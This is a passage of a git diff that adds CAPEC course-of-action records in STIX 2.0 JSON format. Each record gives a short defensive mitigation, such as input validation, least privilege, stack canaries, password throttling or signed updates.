"bundle--a79a5cd2-5cb6-46ad-bb74-a11a277d38a0", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Because Symlink can be modified by an adversary, make sure that the ones you read are located in protected directories.", + "id": "course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-45-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353.json new file mode 100644 index 0000000000000000000000000000000000000000..8ad1b6249cea10a31445fd73d801b778914f1d7d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--06cf8cf8-fc31-4ccd-b32d-f59fe84fc22b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operation: When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.", + "id": "course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-222-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899.json new file mode 100644 index 0000000000000000000000000000000000000000..dc24e39c985c538ba49a29ed73542a52a69ba130 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--05a7d31b-7e9d-4a79-82a0-eb9ac1a92c84", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Do not program input values directly on command shell, instead treat user input as guilty until proven innocent. Build a function that takes user input and converts it to applications specific types and values, stripping or filtering out all unauthorized commands and characters in the process.", + "id": "course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-6-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1033b942-9114-4d36-9d75-7b3b3f7b9186.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1033b942-9114-4d36-9d75-7b3b3f7b9186.json new file mode 100644 index 0000000000000000000000000000000000000000..006cfdb86d5fe66b379ba532b7936b00996051ce --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1033b942-9114-4d36-9d75-7b3b3f7b9186.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--d9c1d4be-475d-4580-bce8-7b36173d1745", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management of microcode and microcode generating tools and software.", + "id": "course-of-action--1033b942-9114-4d36-9d75-7b3b3f7b9186", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-672-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135.json new file mode 100644 index 0000000000000000000000000000000000000000..32e40536b73165d0b688c77eb8ab124902a0c44c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--b8ecdee2-8cd2-45e0-935b-f156b45261aa", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Enforce principle of least privilege.", + "id": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598.json new file mode 100644 index 0000000000000000000000000000000000000000..4ea531f9acba13eb0d37d2b84883cd3ffbfbb71d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--6a76ca5e-1d73-4061-bab1-07ce7a6e4506", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use hardware security modules/trusted platform modules to verify authenticity using hardware-based cryptography.", + "id": "course-of-action--10ee6dd5-e2ac-41d7-92e2-37e1270f8598", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-532-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9.json new file mode 100644 index 0000000000000000000000000000000000000000..7eefdc1d297e7a32e960a01b35ad048fd2754730 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--19e8f33c-05e6-47d6-b4e0-d14b5f4c17aa", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.", + "id": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382.json new file mode 100644 index 0000000000000000000000000000000000000000..3dad2fbb1c2bd667ee5b0f3fe967c5ff8929564e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--d84989ed-26f3-457e-9a87-0aa2cc21f9c6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user.", + "id": "course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-49-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1.json new file mode 100644 index 0000000000000000000000000000000000000000..83323abcb2f3632d174516c2dbd7bb900ef2d53f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--a93e97ab-d799-4cf5-9944-ea4a57403526", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal formatting characters.", + "id": "course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-135-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7.json new file mode 100644 index 0000000000000000000000000000000000000000..9367727459713c9486fc91a2a58b5c0e3ff202ab --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--44380af6-6153-49e6-9030-95200c0c39c5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Sanitize incoming DTDs to prevent excessive expansion or other actions that could result in impacts like resource depletion.", + "id": "course-of-action--1370701a-b19a-4690-9a01-1c14c7c7f2a7", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-228-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--13ef96e6-899a-447b-ae18-9efc1cef937a.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--13ef96e6-899a-447b-ae18-9efc1cef937a.json new file mode 100644 index 0000000000000000000000000000000000000000..8fc8ebbea984ccc41b51425c119e4440532e82c4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--13ef96e6-899a-447b-ae18-9efc1cef937a.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--67acce40-8131-4516-b303-d5f09b01a4b9", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Educate designers, developers, engineers, etc. on social engineering attacks to avoid downloading malicious software via attacks such as phishing attacks", + "id": "course-of-action--13ef96e6-899a-447b-ae18-9efc1cef937a", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-537-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.7" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c.json new file mode 100644 index 0000000000000000000000000000000000000000..82e2be5d1856708750d31e33953b2b98ffd2d3d1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--e9ab19f6-7a46-4a74-9453-69bd34f25036", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When using Bluetooth, set it to hidden or non-discoverable mode.", + "id": "course-of-action--140ba36d-41b8-4ced-a9f0-2faddb5e366c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-666-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55.json new file mode 100644 index 0000000000000000000000000000000000000000..0595e3e40c718dbaaa5dcd4b4f6f8904050a812a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--4ba760f2-351f-4f3c-a404-9c90fd49f70e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid emailing important documents and configurations.", + "id": "course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.8" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b.json new file mode 100644 index 0000000000000000000000000000000000000000..e3a58e03dde4dbeb4e05d273d25214e7ed2bcb5d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--7103ec74-ef0a-4021-b2b4-c46d661730ef", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only accept software updates from an official source.", + "id": "course-of-action--14bd0b42-4bad-4eca-8a98-142fd83e149b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-533-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--14ea1dd8-a232-4071-897a-a930751702bb.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--14ea1dd8-a232-4071-897a-a930751702bb.json new file mode 100644 index 0000000000000000000000000000000000000000..0cf546c9db7ea6729eed07979368535bd3f41666 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--14ea1dd8-a232-4071-897a-a930751702bb.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--a714c137-380a-4589-9950-543ca2c52ddf", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use commonly accepted algorithms and recommended key sizes. The key size used will depend on how important it is to keep the data confidential and for how long.", + "id": "course-of-action--14ea1dd8-a232-4071-897a-a930751702bb", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-20-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--15bb56ee-cdaf-431b-8136-e8cf24a3ca11.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--15bb56ee-cdaf-431b-8136-e8cf24a3ca11.json new file mode 100644 index 0000000000000000000000000000000000000000..a56fcf71d3723814970aea2ac2fba6a13412b32a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--15bb56ee-cdaf-431b-8136-e8cf24a3ca11.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--0c677580-4ee2-49ff-90d1-8f33ece54b74", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Carefully review the service's implementation before making it available to user. For instance you can use manual or automated code review to uncover vulnerabilities such as integer overflow.", + "id": "course-of-action--15bb56ee-cdaf-431b-8136-e8cf24a3ca11", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-92-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16492a56-a1ff-45ac-9d60-937a2b5faa49.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16492a56-a1ff-45ac-9d60-937a2b5faa49.json new file mode 100644 index 0000000000000000000000000000000000000000..3765882eafaa61222dace954c204554e78e759a4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16492a56-a1ff-45ac-9d60-937a2b5faa49.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--4fddebd9-4740-4b73-9a47-e68b16bf1e0d", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require elevated privileges for distribution of software and software updates.", + "id": "course-of-action--16492a56-a1ff-45ac-9d60-937a2b5faa49", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-669-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--167812bc-7a9b-4800-ae3e-5bb696d54905.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--167812bc-7a9b-4800-ae3e-5bb696d54905.json new file mode 100644 index 0000000000000000000000000000000000000000..828b3349820882f2a11f8fd30e1f38b3972265cd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--167812bc-7a9b-4800-ae3e-5bb696d54905.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--367d2508-c450-4c5e-a6b0-8e7b2a36fc2a", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor and control access to the configuration management system.", + "id": "course-of-action--167812bc-7a9b-4800-ae3e-5bb696d54905", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-678-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16973fac-22ce-4b43-b7f4-e6167f990299.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16973fac-22ce-4b43-b7f4-e6167f990299.json new file mode 100644 index 0000000000000000000000000000000000000000..52d4de8422e13264b6dcc5319939111a25bcbebf --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16973fac-22ce-4b43-b7f4-e6167f990299.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--efb9414d-e6d7-4a0b-83b5-abafedd0dde7", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Further down the process flow, examining the response and verifying that it is as expected before sending would be another way to secure the server.", + "id": "course-of-action--16973fac-22ce-4b43-b7f4-e6167f990299", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-664-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16b0e524-3a58-48ca-9574-742a815d2e57.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16b0e524-3a58-48ca-9574-742a815d2e57.json new file mode 100644 index 0000000000000000000000000000000000000000..28e2fa3be9b7ad1a3f77f65c65986851547c7dbb --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16b0e524-3a58-48ca-9574-742a815d2e57.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--834020e5-7f97-46d6-901c-e21e908b2d64", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Sign update packages and BIOS patches.", + "id": "course-of-action--16b0e524-3a58-48ca-9574-742a815d2e57", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-532-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5.json new file mode 100644 index 0000000000000000000000000000000000000000..457637df511b76c9be5f16820d0c7c63aebd5740 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--281e58ab-0b27-4a14-8e95-021fe34db978", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.", + "id": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--df271008-9c98-4fa2-b659-d6b978747eb4.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--df271008-9c98-4fa2-b659-d6b978747eb4.json new file mode 100644 index 0000000000000000000000000000000000000000..0e2367daba98e4c12873f123230f94a35af6f8e2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--df271008-9c98-4fa2-b659-d6b978747eb4.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--0b5f7a1a-f961-4210-93fb-9e2882ba046d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that ANY failure occurring in the filtering or input validation routine is properly handled and that offending input is NOT allowed to go through. Basically make sure that the vault is closed when failure occurs.", + "id": "course-of-action--df271008-9c98-4fa2-b659-d6b978747eb4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-24-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--e2d6481d-fb04-45e8-9e24-706eeca3f87d.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--e2d6481d-fb04-45e8-9e24-706eeca3f87d.json new file mode 100644 index 0000000000000000000000000000000000000000..bc50bcc24615aefeeda6b8bacdeefa3043760b3d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--e2d6481d-fb04-45e8-9e24-706eeca3f87d.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--6d9e5b32-a08a-48a4-8591-81ad9d878c22", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize strict type, character, and encoding enforcement.", + "id": "course-of-action--e2d6481d-fb04-45e8-9e24-706eeca3f87d", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-19-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--e5ecca4e-c16e-4c31-bde1-c6778a1381f0.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--e5ecca4e-c16e-4c31-bde1-c6778a1381f0.json new file mode 100644 index 0000000000000000000000000000000000000000..b82ddbf9da31ae27c0c317408c3ad8ba806d04d1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--e5ecca4e-c16e-4c31-bde1-c6778a1381f0.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--10732765-293a-48d4-bf4a-2303dc3ad8af", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Backup device data before erasure to retain intellectual property and inside knowledge.", + "id": "course-of-action--e5ecca4e-c16e-4c31-bde1-c6778a1381f0", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-675-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.7" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--e818356e-b136-4fb6-a5f6-5e4208739ef7.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--e818356e-b136-4fb6-a5f6-5e4208739ef7.json new file mode 100644 index 0000000000000000000000000000000000000000..ce7e4ed5bdb054730be5a07e616073fdae26232d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--e818356e-b136-4fb6-a5f6-5e4208739ef7.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--994f7fd6-42c1-4ae9-8849-4ac24cafad9e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Employ DNS resolvers that prevent external names from resolving to internal addresses.", + "id": 